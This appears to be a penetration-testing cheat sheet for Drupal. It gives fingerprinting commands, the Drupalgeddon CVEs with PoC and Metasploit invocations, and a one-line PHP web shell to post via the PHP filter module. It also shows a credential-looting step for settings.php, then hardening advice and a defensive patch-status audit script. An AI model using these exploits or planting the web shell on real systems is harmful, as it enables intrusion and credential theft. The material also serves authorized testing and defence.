Service bank
WEB / APP 80/tcp 443/tcp

Drupal

PHP CMS. The Drupalgeddon CVEs give unauthenticated RCE, and with admin the PHP filter module or a backdoored module runs code; settings.php holds the DB creds.

Ports

Port  Proto  Notes
80    tcp    HTTP
443   tcp    HTTPS

Fingerprint

  • CHANGELOG.txt and the X-Generator header reveal the version
  • /node, /user/login and the Drupal cookie give it away; droopescan confirms

Key files

Path                         Holds                             Sensitive
sites/default/settings.php   DB credentials and the hash salt  sensitive

Default / weak creds

  • admin via brute force / reuse

Known CVEs

CVE            Impact
CVE-2018-7600  Drupalgeddon2, unauthenticated RCE
CVE-2018-7602  Drupalgeddon3, authenticated RCE
CVE-2019-6340  REST RCE via unserialize

Exploitation primitives

  • Drupalgeddon2/3 for unauthenticated or authenticated RCE on old cores
  • Admin: enable the PHP filter module and post a node containing PHP, or upload a backdoored module
  • settings.php DB creds for reuse

Overview

Drupal is a PHP CMS best known for the Drupalgeddon unauthenticated RCE chain. Even patched against those, admin access plus the PHP filter module is code execution.

Enumeration

Version (drives which Drupalgeddon applies):

curl -s http://<TARGET>/CHANGELOG.txt | head
droopescan scan drupal -u http://<TARGET>/

Unauthenticated RCE — Drupalgeddon2 (CVE-2018-7600)

Drupal core 7.x < 7.58 / 8.x < 8.5.1. Run a PoC:

python3 drupalgeddon2.py http://<TARGET>/

Or Metasploit:

msf > use exploit/unix/webapp/drupal_drupalgeddon2

REST unserialize RCE (8.x, CVE-2019-6340), applicable when the core REST module is enabled and a GET/PATCH endpoint is exposed:

msf > use exploit/unix/webapp/drupal_restws_unserialize

Authenticated RCE (admin)

Enable the PHP filter module (Modules), then create a node or block whose body is PHP and set its text format to “PHP code”:

<?php system($_GET['c']); ?>

Browse the node with ?c=id. On Drupal 8+ (no PHP filter), upload a backdoored module instead.

Loot

curl -s http://<TARGET>/sites/default/settings.php   # DB creds + hash salt; the web server executes PHP rather than serving its source, so read the file via LFI or a shell

Hardening

Patch core promptly, remove the PHP filter module, and use strong admin auth.
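As an added example covering both the Enumeration notes (version from CHANGELOG.txt, the X-Generator header or the on-disk VERSION constant) and the Hardening advice above, the script below audits an install from the defender's side: it parses the version out of those sources, compares it against the Drupalgeddon2 fix versions exactly as the page lists them (7.58 and 8.5.1), and flags settings.php permission bits that let more than the web server read the DB credentials and hash salt. It is not Drupal's own code; the tree paths `includes/bootstrap.inc` and `core/lib/Drupal.php` are the standard 7.x/8.x locations of the VERSION constant, and every sample input is constructed.

```python
"""Drupal patch-status and settings.php exposure audit (added example)."""
import os
import re
import stat
from pathlib import Path

# Fix versions exactly as the cheat sheet states them (7.x < 7.58, 8.x < 8.5.1).
DRUPALGEDDON2_FIXED = {7: (7, 58), 8: (8, 5, 1)}

# Where each major keeps its VERSION constant (assumed standard tree layout).
VERSION_FILES = ["includes/bootstrap.inc", "core/lib/Drupal.php"]

_CONST_RE = re.compile(r"VERSION['\"]?\s*[,=]\s*['\"](\d+(?:\.\d+)+)['\"]")
_TEXT_RE = re.compile(r"Drupal\s+(\d+(?:\.\d+)*)")


def parse_version(text):
    """Return the Drupal version found in `text` as a tuple of ints, or None.

    Accepts a CHANGELOG.txt header ('Drupal 7.57, 2018-02-21'), an
    X-Generator header ('Drupal 8 (https://www.drupal.org)', major only) and
    PHP source ("define('VERSION', '7.57');" or "const VERSION = '8.5.0';").
    """
    m = _CONST_RE.search(text) or _TEXT_RE.search(text)
    if m is None:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def drupalgeddon2_status(version):
    """'vulnerable', 'patched' or 'unknown' against the page's fix versions.

    'unknown' covers a missing version, a bare major (X-Generator carries no
    minor, so CHANGELOG.txt or the VERSION constant is still needed) and
    majors the page's table does not cover.
    """
    if version is None or len(version) < 2:
        return "unknown"
    fixed = DRUPALGEDDON2_FIXED.get(version[0])
    if fixed is None:
        return "unknown"
    return "vulnerable" if version < fixed else "patched"


def version_from_tree(root):
    """Read the VERSION constant from a local Drupal tree (7.x or 8.x)."""
    for rel in VERSION_FILES:
        path = Path(root) / rel
        if path.is_file():
            return parse_version(path.read_text(errors="replace"))
    return None


def exposure_from_mode(mode):
    """Flag permission bits on settings.php that widen who can read the DB
    credentials and hash salt, or who can rewrite the file."""
    return {
        "world_readable": bool(mode & stat.S_IROTH),
        "group_writable": bool(mode & stat.S_IWGRP),
        "world_writable": bool(mode & stat.S_IWOTH),
    }


def settings_php_exposure(root):
    """Exposure report for <root>/sites/default/settings.php, or None if absent."""
    path = Path(root) / "sites/default/settings.php"
    if not path.is_file():
        return None
    return exposure_from_mode(os.stat(path).st_mode)


if __name__ == "__main__":
    # Constructed samples standing in for real fingerprint output.
    samples = {
        "CHANGELOG.txt": "Drupal 7.57, 2018-02-21",
        "X-Generator": "Drupal 8 (https://www.drupal.org)",
        "bootstrap.inc": "define('VERSION', '7.58');",
        "Drupal.php": "const VERSION = '8.5.0';",
    }
    for source, text in samples.items():
        v = parse_version(text)
        print(f"{source:14} {'.'.join(map(str, v)):8} {drupalgeddon2_status(v)}")
    print("settings.php 0644:", exposure_from_mode(0o644))
```

Run it against a local webroot with `version_from_tree("/var/www/drupal")` and `settings_php_exposure("/var/www/drupal")`; a result of "vulnerable" or a world-readable settings.php is what the Hardening line above is telling you to fix.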

References